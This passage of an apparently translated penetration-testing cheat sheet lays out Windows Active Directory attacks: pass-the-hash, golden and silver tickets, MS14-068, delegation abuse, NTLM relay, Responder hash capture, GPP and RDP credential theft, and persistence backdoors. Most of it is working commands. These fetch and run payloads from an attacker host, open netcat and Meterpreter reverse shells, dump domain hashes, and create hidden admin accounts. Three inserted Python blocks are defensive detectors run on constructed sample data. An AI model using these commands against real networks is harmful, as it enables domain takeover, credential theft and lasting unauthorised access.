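            if e["id"] == 4768 and e["preauth"] == 0]


def password_spray_sources(events, window=timedelta(minutes=5), min_accounts=5):
    """4771 with status 0x18 (bad password): one client IP failing against
    many distinct accounts inside the window is the pattern that
    Kerbrute passwordspray and Invoke-DomainPasswordSpray leave behind.
    Returns {ip: distinct accounts seen in the first window that trips}."""
    failures = defaultdict(list)
    for e in events:
        if e["id"] == 4771 and e["status"] == "0x18":
            failures[e["ip"]].append((parse_time(e["time"]), e["account"]))
    flagged = {}
    for ip, items in failures.items():
        items.sort()
        for i, (t0, _) in enumerate(items):
            accounts = {a for t, a in items[i:] if t - t0 <= window}
            if len(accounts) >= min_accounts:
                flagged[ip] = len(accounts)
                break
    return flagged


# Constructed sample events (not real log data).
SAMPLE_EVENTS = [
    {"id": 4769, "time": "2020-10-08 09:00:01", "account": "y@ZONE.COM",
     "ip": "10.1.1.98", "service": "svc_sql", "etype": "0x17", "status": "0x0"},
    {"id": 4769, "time": "2020-10-08 09:00:02", "account": "y@ZONE.COM",
     "ip": "10.1.1.98", "service": "SUB2K8$", "etype": "0x12", "status": "0x0"},
    {"id": 4769, "time": "2020-10-08 09:00:03", "account": "y@ZONE.COM",
     "ip": "10.1.1.98", "service": "krbtgt", "etype": "0x17", "status": "0x0"},
    {"id": 4768, "time": "2020-10-08 09:01:00", "account": "y",
     "ip": "10.1.1.98", "preauth": 0, "etype": "0x17"},
    {"id": 4768, "time": "2020-10-08 09:01:05", "account": "godadmin",
     "ip": "10.1.1.50", "preauth": 2, "etype": "0x12"},
    {"id": 4771, "time": "2020-10-08 09:03:00", "account": "bob",
     "ip": "10.1.1.50", "status": "0x18"},
] + [
    {"id": 4771, "time": "2020-10-08 09:02:%02d" % i, "account": "user%d" % i,
     "ip": "10.1.1.98", "status": "0x18"}
    for i in range(6)
]

if __name__ == "__main__":
    print("kerberoast:", kerberoast_candidates(SAMPLE_EVENTS))
    print("asrep:", asrep_roast_candidates(SAMPLE_EVENTS))
    print("spray:", password_spray_sources(SAMPLE_EVENTS))
```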


PASS-THE-HASH

Allow all members of the local administrators group to connect
>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

WMIExec & TheHash

>powershell -ep bypass
>IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-TheHash/Invoke-WMIExec.ps1');
>IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-TheHash/Invoke-TheHash.ps1');
>Invoke-TheHash -Type WMIExec -Target 192.168.0.0/24 -Domain zone.com -Username godadmin -Hash f1axxxxxxxxxb771

WMI

>net use \\1.1.1.1\admin$ /user:"administrator" "password"
>copy windowsupdate.exe \\1.1.1.1\admin$\dir\
>wmic /NODE:"1.1.1.1" /user:"administrator" /password:"password" PROCESS call create "c:\windows\dir\windowsupdate.exe"
>del \\1.1.1.1\admin$\dir\windowsupdate.exe /F
>net use \\1.1.1.1\admin$ /del

wmiexec.py
https://github.com/SecureAuthCorp/impacket
>python wmiexec.py -hashes AAD3B435B51404EEAAD3B435B51404EE:A812E6C2DEFCB0A7B80868F9F3C88D09 <domain>/Administrator@192.168.11.1 "whoami"
>python wmiexec.py admin@192.168.1.2

wmiexec.vbs
Semi-interactive:
>cscript //nologo wmiexec.vbs /shell 192.168.1.2 admin pass
Single command
>cscript //nologo wmiexec.vbs /cmd 192.168.1.2 domain\admin pass "whoami"
Download and execute
>wmic /node:192.168.0.115 /user:godadmin /password:password PROCESS call create "cmd /c certutil.exe -urlcache -split -f http://192.168.0.107/clickme.exe c:/windows/temp/win.exe & c:/windows/temp/win.exe & certutil.exe -urlcache -split -f http://192.168.0.107/clickme.exe delete"

Powershell
>wmic /NODE:192.168.3.108 /user:"godadmin" /password:"password" PROCESS call create "powershell -nop -exec bypass -c \"IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.107/xxx.txt');\""
Invoke-WMIExec
>powershell -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-WMIExec.ps1');Invoke-WMIExec -Target 192.168.0.115 -Domain Workgroup -Username godadmin -Hash f1a5b1a3641bec99ff92fe9df700b771 -Command \"net user admin Qwe@123 /add\" -Verbose"

>powershell -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-WMIExec.ps1');Invoke-WMIExec -Target 192.168.0.115 -Domain Workgroup -Username godadmin -Hash f1xxxxxxxxxxxxx771 -Command \"mshta http://192.168.0.107:8080/YAyAPN6odzbAzKn.hta\" -Verbose"

Psexec

>psexec.exe -hashes AAD3B435B51404EEAAD3B435B51404EE:A812E6C2DEFCB0A7B80868F9F3C88D09 <domain>/Administrator@192.168.1.1 "whoami"
>psexec.exe -accepteula \\192.168.1.2 -u admin -p pass cmd.exe    no confirmation dialog
Msf
#use exploit/windows/smb/psexec
#use exploit/windows/smb/psexec_psh (powershell version)

Mimikatz

On Windows XP, Vista, 7, 2008, 2008 R2 and 2012 without the KB2871997 patch, PTH uses the NTLM hash
mimikatz # privilege::debug
mimikatz # sekurlsa::pth /user:admin /domain:xxx.com /ntlm:{ntlm}
Run a file
mimikatz # sekurlsa::pth /user:admin /domain:xxx.com /ntlm:{ntlm} /run:powershell.exe
On Windows 8.1 and 2012 R2, and on Win 7, 2008 R2 and 2012 with KB2871997 installed, PTH can use the AES key
>privilege::debug
>sekurlsa::ekeys
>sekurlsa::pth /user:administrator /domain:zone.com /aes128:{key}

pth-winexe

>pth-winexe -U godadmin%password --system --ostype=1 //192.168.0.115 cmd

Smbexec

>python smbexec.py administrator@192.168.0.98


PASS-THE-TICKET

Terms
KDC (Key Distribution Center): the key distribution center; it contains two services, AS and TGS
AS (Authentication Server): the authentication service
TGS (Ticket Granting Server): the ticket-granting service
TGT (Ticket Granting Ticket): the ticket issued by the authentication service, used for authentication, kept in memory, valid for 10 hours by default

Golden ticket + Mimikatz

A Golden Ticket is a forged TGT (Ticket Granting Ticket); it grants access to any Kerberos service. The krbtgt hash is extracted from the domain controller.
Domain controller: dc.zone.com
Domain member: sub2k8.zone.com
Ordinary domain user: y
The domain member cannot access files on the dc.

Purge tickets

Get the krbtgt account's information on the domain controller
>privilege::debug
>mimikatz log "lsadump::dcsync /domain:zone.com /user:krbtgt"
Information obtained: /domain, /sid, /aes256

Generate the golden ticket on sub2k8
>mimikatz "kerberos::golden /krbtgt:{ntlmhash} /admin:<domain admin> /domain:<domain> /sid:<sid> /ticket:gold.kirbi"

Import
Mimikatz#kerberos::ptt 123.kirbi

Silver ticket + Mimikatz

A Silver Ticket is a forged TGS; it only grants access to the specified service.
Domain controller: dc.zone.com
Domain member: sub2k8.zone.com
Ordinary domain user: y
Export on the domain controller
>privilege::debug
>sekurlsa::logonpasswords

Forge the ticket on Sub2k8
>mimikatz "kerberos::golden /domain:zone.com /sid:{SID} /target:dc.zone.com /service:cifs /rc4:{NTLM} /user:y /ptt"

MS14-068

https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068
https://github.com/crupper/Forensics-Tool-Wiki/blob/master/windowsTools/PsExec64.exe
Domain controller: dc.zone.com/10.1.1.100
Domain member: sub2k8.zone.com/10.1.1.98
Ordinary domain user: y
Purge tickets on Sub2k8
Mimikatz#kerberos::purge
>whoami /user    look up the SID
Create the ccache ticket file
> MS14-068.exe -u y@zone.com -p password -s S-1-5-21-2346829310-1781191092-2540298887-1112 -d dc.zone.com
Inject the ticket
Mimikatz# Kerberos::ptc c:\xx\xx\xxx.ccache
Log in with psexec without a password
>PsExec.exe \\dc.xx.com\ cmd.exe

Mimikatz+MSF

>whoami /user    look up the SID
msf >use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
msf >set domain <domain>
msf >set password <password>
msf >set rhost <domain controller>
msf >set user <user>
msf >set user_sid <sid>
This produces a .bin file
#apt-get install krb5-user
Upload mimikatz and the bin file
Mimikatz# Kerberos::clist "xxxx.bin" /export
This generates a kirbi file
Meterpreter >load kiwi
Meterpreter >download c:/wmpub/xxxxxx.kirbi /tmp/
Inject the ticket
Meterpreter >kerberos_ticket_use /tmp/xxxxxx.kirbi
#use exploit/windows/local/current_user_psexec
#set TECHNIQUE PSH
#set RHOST dc.xx.com
#set payload windows/meterpreter/reverse_tcp
#set LHOST 192.168.1.1
#set session 1
#exploit

goldenPac.py

On kali
#apt-get install krb5-user
#goldenPac.py -dc-ip 10.1.1.100 -target-ip 10.1.1.100 zone.com/y:password@dc.zone.com

Account delegation

Unconstrained delegation

Make user y a service account (service accounts can be granted delegation)
>setspn -U -A variant/golden y

Query domain accounts with unconstrained delegation, using powerview
>Get-NetUser -Unconstrained -Domain zone.com

Exploitation
Open mimikatz with administrator privileges and export the TGT
>privilege::debug
>sekurlsa::tickets /export

Purge tickets, then import the ticket

Obtain a Powershell session
> Enter-PSSession -ComputerName dc.zone.com

Constrained delegation

Query users with constrained delegation
> Get-DomainUser -TrustedToAuth -Domain zone.com

Query hosts with constrained delegation
> Get-DomainComputer -TrustedToAuth -Domain zone.com

The exploitation method is covered later, in the persistence section

Resource-based constrained delegation

Get a domain administrator
>Get-DomainUser|select -First 1
Domain object information
>Get-DomainObject -Identity 'DC=zone,DC=com'
ms-ds-machineaccountquota allows an unprivileged user to join up to 10 computers to the domain

Check whether the msDS-AllowedToActOnBehalfOfOtherIdentity attribute is set
>Get-DomainComputer dc|select name, msDS-AllowedToActOnBehalfOfOtherIdentity

Use powermad to add a machine account with an SPN
https://github.com/Kevin-Robertson/Powermad
>New-MachineAccount -MachineAccount newcom

>$pass = ConvertTo-SecureString '123qwe!@#' -AsPlainText -Force
>New-MachineAccount -MachineAccount newcom -Password $pass
>New-MachineAccount -MachineAccount newcom -Password $(ConvertTo-SecureString '123qwe!@#' -AsPlainText -Force)

Get the SID of the added machine account

Write the SID of the added machine account into the DC's msDS-AllowedToActOnBehalfOfOtherIdentity attribute
>$SD=New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-2346829310-1781191092-2540298887-1122)"; $SDBytes = New-Object byte[] ($SD.BinaryLength);$SD.GetBinaryForm($SDBytes, 0);Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
Check after setting

The ACL that allows access
>$RawBytes=Get-DomainComputer dc -Properties 'msds-allowedtoactonbehalfofotheridentity' |select -expand msds-allowedtoactonbehalfofotheridentity;$Descriptor= New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes,0;$Descriptor.DiscretionaryAcl

Now the hash of the created machine account can be used to impersonate a domain admin
First get newcom's NTLM hash

>Rubeus.exe hash /password:123qwe!@# /user:newcom /domain:zone.com

Import the ticket and access the cifs service as the impersonated domain admin
>Rubeus.exe s4u /user:newcom$ /rc4:00AFFD88FA323B00D4560BF9FEF0EC2F /impersonateuser:godadmin /msdsspn:cifs/dc.zone.com /ptt

The TGS for godadmin is obtained
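Added example (not from the original post): a defender-side audit of the SDDL written into msDS-AllowedToActOnBehalfOfOtherIdentity by the Set-DomainObject command above, listing every SID granted resource-based constrained delegation onto the computer and flagging those not on an allow-list. The allow-list is an assumption; the SDDL string and SID are the page's own.

```python
"""Audit the SDDL form of msDS-AllowedToActOnBehalfOfOtherIdentity to list
the SIDs granted resource-based constrained delegation onto a computer.
Added example, not part of the original post; the SDDL string is the one
written by the Set-DomainObject command above."""
import re

# Two-letter right codes used in SDDL ACE strings (directory-service subset).
RIGHTS = {
    "CC": "CreateChild", "DC": "DeleteChild", "LC": "ListChildren", "SW": "Self",
    "RP": "ReadProperty", "WP": "WriteProperty", "DT": "DeleteTree",
    "LO": "ListObject", "CR": "ControlAccess", "SD": "Delete", "RC": "ReadControl",
    "WD": "WriteDac", "WO": "WriteOwner", "GA": "GenericAll", "GR": "GenericRead",
    "GW": "GenericWrite", "GX": "GenericExecute",
}
ACE_RE = re.compile(r"\(([^)]*)\)")
OWNER_RE = re.compile(r"O:(S-1-[\d-]+|[A-Z]{2})")


def parse_sddl(sddl):
    """Return (owner, aces). Each ACE is a dict with the six SDDL fields:
    type, flags, rights (decoded), object guid, inherit guid, trustee SID."""
    m = OWNER_RE.search(sddl)
    owner = m.group(1) if m else None
    dacl = sddl.split("D:", 1)[1] if "D:" in sddl else ""
    dacl = dacl.split("S:", 1)[0]          # drop a SACL section if present
    aces = []
    for body in ACE_RE.findall(dacl):
        fields = body.split(";")
        if len(fields) != 6:
            raise ValueError("malformed ACE: (%s)" % body)
        ace_type, flags, rights, obj, inh, sid = fields
        if rights.startswith("0x"):
            decoded = [rights]             # raw access mask, left as-is
        else:
            decoded = [RIGHTS.get(rights[i:i + 2], rights[i:i + 2])
                       for i in range(0, len(rights), 2)]
        aces.append({"type": ace_type, "flags": flags, "rights": decoded,
                     "object": obj, "inherit": inh, "sid": sid})
    return owner, aces


def rbcd_grants(sddl):
    """SIDs holding an access-allowed ACE. Each of them can obtain service
    tickets to this computer on behalf of other users (S4U2Proxy)."""
    _, aces = parse_sddl(sddl)
    return sorted(a["sid"] for a in aces if a["type"] == "A")


def unexpected_rbcd(computer, sddl, allowed_sids):
    """Grants that are not on the allow-list, ready for alerting."""
    return [(computer, sid) for sid in rbcd_grants(sddl) if sid not in allowed_sids]


# Value from the Set-DomainObject command above (the trustee is the SID of
# the machine account "newcom" created with Powermad).
RBCD_SDDL = ("O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;"
             "S-1-5-21-2346829310-1781191092-2540298887-1122)")

if __name__ == "__main__":
    # Assumed allow-list: in this lab no SID should hold an RBCD grant on dc.
    for computer, sid in unexpected_rbcd("dc", RBCD_SDDL, allowed_sids=set()):
        print("%s: unexpected RBCD grant to %s" % (computer, sid))
```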

CVE-2019-0708

>python ntlmrelayx.py -t ldaps://dc.zone.com --remove-mic --delegate-access -smb2support
>python printerbug.py zone.com/y@win7.zone.com 192.168.0.attack
>python getST.py -spn host/win7.zone.com 'zone.com/<machine account>$:<password>' -impersonate administrator -dc-ip 192.168.0.1
>export KRB5CCNAME=XX.ccache
>python secretsdump.py -k -no-pass dc.zone.com -just-dc

NTLM relay

Ntlmrelayx + resource-based constrained delegation

The domain controller must have ldaps enabled and the domain machines must have ipv6 enabled.
*If running the ntlmrelayx script raises an error

Modify
impacket/impacket/examples/ntlmrelayx/attacks/ldapattack.py: above line 510 add
if self.config.interactive:

Then reinstall
>python setup.py install
Use mitm6 to take over DNS via ipv6; once configured, hosts on the network start requesting WPAD
>mitm6 -i eth1 -d zone.com

Listen with ntlmrelayx.py
>python ntlmrelayx.py -t ldaps://dc.zone.com -debug -ip 10.1.1.101 --delegate-access --add-computer
When the target restarts its network, opens a browser or reboots, it treats the attack host as its proxy server. When the target accesses the network through that proxy, the attack host sends it a proxy authentication request and relays the NTLM authentication to the LDAP server, completing the attack. ldaps is required here because the domain controller refuses to create accounts over an insecure connection.

The output shows
that a machine account RFAYOVCC with password 6YdX.NXqQGyuR7[ has been added.
Request a ticket with this machine account
>python getST.py -spn cifs/sub2k8.zone.com zone.com/RFAYOVCC\$ -impersonate y

>export KRB5CCNAME=y.ccache
Get a shell
>python smbexec.py -no-pass -k sub2k8.zone.com

Dump hashes and cached hashes
>python secretsdump.py -k -no-pass sub2k8.zone.com

When the domain controller does not have LDAPS enabled and an ordinary domain user is already available
Use powermad to create a machine account newcom
https://github.com/Kevin-Robertson/Powermad
>New-MachineAccount -MachineAccount newcom -Password $(ConvertTo-SecureString '123qwe!@#' -AsPlainText -Force)

>python ntlmrelayx.py -t ldaps://dc.zone.com -debug -ip 10.1.1.101 --delegate-access --escalate-user newcom\$

Then proceed as above.
When a Java webdav exists on the internal network, request methods such as PROPPATCH, PROPFIND and LOCK accept XML as input and are therefore exposed to XXE. When the attacker demands NTLM authentication, webdav authenticates automatically with the current user's credentials. Listen with ntlmrelayx
>python ntlmrelayx.py -t ldaps://dc.zone.com -debug -ip 10.1.1.101 --delegate-access --escalate-user newcom\$
Send the xxe request with Burp
PROPFIND /webdav HTTP/1.1
Host: 1.1.1.1

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe [<!ENTITY loot SYSTEM "http://10.1.1.101"> ]>
<D:xxe xmlns:D="DAV:"><D:set><D:prop><a xmlns="http://xx.e">&loot;</a></D:prop></D:set></D:xxe>

Responder

SMB interception
Man-in-the-middle script for internal networks, built into kali. Listen on a network interface
>responder -I wlan0 (or eth0)
To target a specific host or subnet, change the RespondTo parameter in /etc/responder/Responder.py. Any authentication on the subnet yields an NTLMv2 hash.

When a non-existent share is accessed, modify the configuration file so the name is resolved
Xp
Edit /usr/share/responder/servers/SMB.py, find errorcode and change it to \x71\x00\x00\xc0; delete /usr/share/responder/Responder.db

On XP, accessing a share as \\cmd\share disconnects after 4 password entries.

Locate the line and change it to self.ntry != 10
Win7 and above
Edit /usr/share/responder/servers/SMB.py and find ##Session Setup 3

Remove and GrabMessageID(data)[0:1] == "\x02", and delete /usr/share/responder/Responder.db. After this change the name resolves and the hash is captured; otherwise error 64 is reported.

WPAD proxy spoofing
>responder -I eth0 -v -F
The F option enables forced WPAD authentication to capture hashes; opening IE or rebooting makes the host send the spoofed authentication, yielding the hash.

A reboot also captures it.

Web vulnerabilities
Using file inclusion and XSS on the internal network
>Responder -I eth0 -v
http://10.1.1.1/file.php?file=\\10.1.1.12\share
http://10.1.1.1/xss.php?article=<img src=\\10.1.1.12\xx>
Relay attack
Edit /etc/responder/Responder.conf and set smb and http to Off. Open two terminals: one runs Responder with -F to spoof WPAD in browsers, the other runs MultiRelay.py from /usr/share/responder/tools to relay the authentication and obtain a cmd shell on the target.
>Responder -I eth0 -v -F
>python MultiRelay.py -t 192.168.0.115 -u ALL

NTLMv2 hash cracking
Crack with hashcat; -m 5600 is the NTLMv2 type
>hashcat -m 5600 pass.txt wordlists.txt


GPP-Password

Domain machines can access the \\zone.com\SYSVOL\zone.com share; browse the policy files and look for groups.xml, ScheduledTasks\ScheduledTasks.xml, Printers\Printers.xml, Drives\Drives.xml, DataSources\DataSources.xml, Services\Services.xml and similar files

Decrypt with the powersploit script

Or use msf's auxiliary/scanner/smb/smb_enum_gpp module
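Added example (not from the original post): the audit a defender runs over the same SYSVOL files, reporting every Group Policy Preference element that still carries a cpassword attribute. The XML documents and paths below are constructed; the file names are the ones the post lists.

```python
"""Report Group Policy Preference XML elements that still carry a cpassword
attribute. Added example, not part of the original post; the XML below is
constructed sample data, not real policy files."""
import xml.etree.ElementTree as ET

# Preference files the post lists, relative to a GPO's Machine\Preferences
# or User\Preferences folder.
GPP_FILES = ("Groups\\Groups.xml", "ScheduledTasks\\ScheduledTasks.xml",
             "Printers\\Printers.xml", "Drives\\Drives.xml",
             "DataSources\\DataSources.xml", "Services\\Services.xml")
NAME_ATTRS = ("userName", "accountName", "runAs", "newName")


def find_cpasswords(xml_text, source="<memory>"):
    """Return (source, tag, account name, changed) for each element whose
    Properties child carries a non-empty cpassword attribute."""
    findings = []
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        props = elem.find("Properties")
        if props is None or not props.attrib.get("cpassword"):
            continue  # no Properties child, or no stored credential
        name = next((props.attrib[k] for k in NAME_ATTRS if k in props.attrib),
                    elem.attrib.get("name", ""))
        findings.append((source, elem.tag, name, elem.attrib.get("changed", "")))
    return findings


def audit_sysvol(files):
    """files: mapping path -> xml text (in practice read from \\\\domain\\SYSVOL).
    Unparseable files are reported rather than skipped silently."""
    out = []
    for path, text in files.items():
        try:
            out.extend(find_cpasswords(text, path))
        except ET.ParseError as exc:
            out.append((path, "ParseError", str(exc), ""))
    return out


# Constructed sample: a Groups.xml that sets a local admin password and a
# Drives.xml mapping with no credential.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="localadmin"
        changed="2020-10-08 12:00:00" uid="{PLACEHOLDER-GUID}">
    <Properties action="U" newName="" fullName="" description=""
        cpassword="CONSTRUCTED_BASE64_VALUE" changeLogon="0" noChange="1"
        neverExpires="1" acctDisabled="0" userName="localadmin"/>
  </User>
</Groups>"""

SAMPLE_DRIVES_XML = """<?xml version="1.0" encoding="utf-8"?>
<Drives clsid="{8FDDCC1A-0C3C-43cd-A6B4-71A6DF20DA8C}">
  <Drive clsid="{935D1B74-9CB8-4e3c-9914-7DD559B7A417}" name="S:" changed="2020-10-08 12:00:00">
    <Properties action="U" path="\\\\fs01\\share" label="Share" letter="S"/>
  </Drive>
</Drives>"""

SAMPLE_SYSVOL = {
    "\\\\zone.com\\SYSVOL\\zone.com\\Policies\\{GPO-GUID}\\Machine\\Preferences\\Groups\\Groups.xml": SAMPLE_GROUPS_XML,
    "\\\\zone.com\\SYSVOL\\zone.com\\Policies\\{GPO-GUID}\\User\\Preferences\\Drives\\Drives.xml": SAMPLE_DRIVES_XML,
}

if __name__ == "__main__":
    for finding in audit_sysvol(SAMPLE_SYSVOL):
        print(finding)
```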


WinRM fileless execution

>winrm quickconfig -q    start winrm
or in PS
>Enable-PSRemoting -Force
Generate the payload and start the listener

Put it on the C: drive of a machine you already control
On another internal machine run
>net use \\192.168.0.115\c$
>winrm invoke create wmicimv2/win32_process @{commandline="\\192.168.0.115\c$\index.exe"}

Adding a domain admin
>net user admin$ pass@123 /add /domain
>net group "Domain admins" admin$ /add /domain

SSH key login without a password

>ssh -i id_rsa user@192.168.0.110

Retrieving saved RDP passwords

Location: C:\Users\<user>\AppData\Local\Microsoft\Credentials
View
>cmdkey /list
>mimikatz log
#dpapi::cred /in:C:\Users\administrator\AppData\Local\Microsoft\Credentials\D53BF8DC4D52D75463D46595907A4015
Note guidMasterKey: {572115f2-80b1-4b1e-be1b-425f5c7a8bfd}
#privilege::debug
#sekurlsa::dpapi
Find the MasterKey listed under the GUID equal to guidMasterKey: d928f5e02d2e9495f92bb…
#dpapi::cred /in:C:\Users\administrator\AppData\Local\Microsoft\Credentials\D53BF8DC4D52D75463D46595907A4015 /masterkey:d928f5e02d2e9495f92bb…
The password is the CredentialBlob value.

Backdoors & persistence

Shadow user

>net user test$ test /add
>net localgroup administrators test$ /add
Registry: HKEY_LOCAL_MACHINE\SAM\SAM\
Give administrator full control and read permission on the SAM key
Export the following as 1.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\test$
Note the default type of HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\test$: 000003EA
Export the following as 2.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003EA
The default type of administrator is 000001F4
Export the following as 3.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
Paste the F value of 000001F4 (3.reg) into the F value of 000003EA (2.reg)
After editing, import
>regedit /s 1.reg
>regedit /s 2.reg
Delete
net user test$ /del
Powershell script
https://github.com/3gstudent/Windows-User-Clone/blob/master/Windows-User-Clone.ps1
Requires system privileges
>Create-Clone -u <user to create> -p <password> -cu <user to clone>

RID hijacking

Scenarios: activate guest and change its RID to the administrator's; change the RID of a low-privilege user
Before hijacking the RID, note the RID value of ordinary user 1

Use msf's post/windows/manage/rid_hijack module

After running, the RID has changed to the superuser's value
Now ordinary user 1 logs in with superuser privileges

Guest activation

Activate the guest account, change its password and add it to the administrators group
>net user guest /active:yes
>net user guest 123qwe!@#
>net localgroup administrators guest /add
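Added example (not from the original post): an offline check of exported SAM user entries for the three local-account tricks above (a cloned "shadow" user, a hijacked RID and a re-enabled Guest). It assumes the documented F-value layout, RID at offset 0x30 and account-control bits at offset 0x38; the F blobs and user table below are constructed.

```python
"""Check SAM user entries for cloned shadow users, hijacked RIDs and an
enabled Guest account. Added example, not part of the original post;
the F-value blobs are constructed and only the fields read here are set."""
import struct

RID_OFFSET = 0x30          # DWORD little-endian RID inside the F value
ACB_OFFSET = 0x38          # WORD little-endian account control bits
ACB_DISABLED = 0x0001
RID_ADMIN, RID_GUEST = 500, 501


def make_f_value(rid, disabled=False):
    """Build a minimal F blob; real blobs are 0x50 bytes and also carry
    logon timestamps, which this check does not use."""
    buf = bytearray(0x50)
    struct.pack_into("<I", buf, RID_OFFSET, rid)
    struct.pack_into("<H", buf, ACB_OFFSET, ACB_DISABLED if disabled else 0)
    return bytes(buf)


def parse_f_value(f):
    rid = struct.unpack_from("<I", f, RID_OFFSET)[0]
    acb = struct.unpack_from("<H", f, ACB_OFFSET)[0]
    return rid, acb


def audit_sam_users(users):
    """users: {name: (key_rid, f_bytes)} where key_rid is the numeric value
    of the hex subkey under SAM\\Domains\\Account\\Users that the
    Names\\<user> default type points to. Returns (name, finding) pairs.
    A copied F value (shadow user) or a rewritten RID (rid_hijack) makes
    the RID inside F differ from the key the entry lives under."""
    findings = []
    for name, (key_rid, f) in users.items():
        f_rid, acb = parse_f_value(f)
        if f_rid != key_rid:
            findings.append((name, "rid-mismatch key=%d f=%d" % (key_rid, f_rid)))
        if f_rid == RID_ADMIN and key_rid != RID_ADMIN:
            findings.append((name, "cloned-administrator"))
        if name.endswith("$") and key_rid >= 1000:
            findings.append((name, "hidden-style-name"))   # not shown by net user
        if key_rid == RID_GUEST and not acb & ACB_DISABLED:
            findings.append((name, "guest-enabled"))
    return findings


# Constructed sample table (not a real SAM dump).
SAMPLE_USERS = {
    "Administrator": (500, make_f_value(500)),
    "Guest": (501, make_f_value(501, disabled=False)),
    "test$": (0x3EA, make_f_value(500)),        # F copied from 000001F4
    "user1": (0x3E9, make_f_value(500)),        # RID rewritten by rid_hijack
    "alice": (0x3EB, make_f_value(0x3EB)),
}

if __name__ == "__main__":
    for name, finding in audit_sam_users(SAMPLE_USERS):
        print("%-14s %s" % (name, finding))
```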

Image hijacking

Sethc

>move sethc.exe 1.exe
>copy cmd.exe sethc.exe
Pressing shift 5 times invokes cmd

Easy to use

Registry
Under Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ create Utilman.exe, and in it a string value Debugger set to C:\Windows\System32\cmd.exe
> REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f

IFEO silent execution

Under Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe create a DWORD value GlobalFlag with hex value 200
Create: Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe
String value: MonitorProcess=muma.exe
DWORD value: ReportingMode=1
>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f
>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe" /v ReportingMode /t REG_DWORD /d 1 /f
>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe" /v MonitorProcess /t REG_SZ /d "c:\windows\system32\cmd.exe" /f

Registry run keys

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce

MSF

Add a listener
Meterpreter> reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'
Check that it was added
Meterpreter> reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
Meterpreter> reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Open an inbound firewall rule
> netsh firewall add portopening TCP 444 "name" ENABLE ALL
Reboot
> shutdown -r -t 0

CMD

View registry run entries
>REG query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Add an entry
>REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "windowsupdate" /t REG_SZ /F /D "c:\windows\temp\update.exe"
Delete an entry
>REG delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "windowsupdate" /f

Scheduled tasks

Loading powershell

>schtasks /Create /tn <name> /tr <program> /sc hourly /mo 1
>schtasks /create /S TARGET /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://192.168.0.107:8080/Invoke-PowerShellTcp.ps1''')'"

Running an exe

Create the task
>schtasks /create /RL HIGHEST /F /tn "windowsupdate" /tr "c:\windows\temp\update.exe" /sc DAILY /mo 1 /ST 12:25 /RU SYSTEM
List the task
>schtasks /query | findstr "windowsupdate"
Run a task immediately
>schtasks /run /tn "windowsupdate"
Delete a task
>schtasks /delete /F /tn "windowsupdate"
Task with ordinary user privileges
>schtasks /create /F /tn "windowsupdate" /tr "D:\user\zhangsan\file\windowsupdate.exe" /sc DAILY /mo 1 /ST 12:25
>schtasks /query | findstr "windowsupdate"
>schtasks /run /tn "windowsupdate"
>schtasks /delete /F /tn "windowsupdate"
>schtasks /tn "SysDebug" /query /fo list /v

Process injection

AppCertDlls

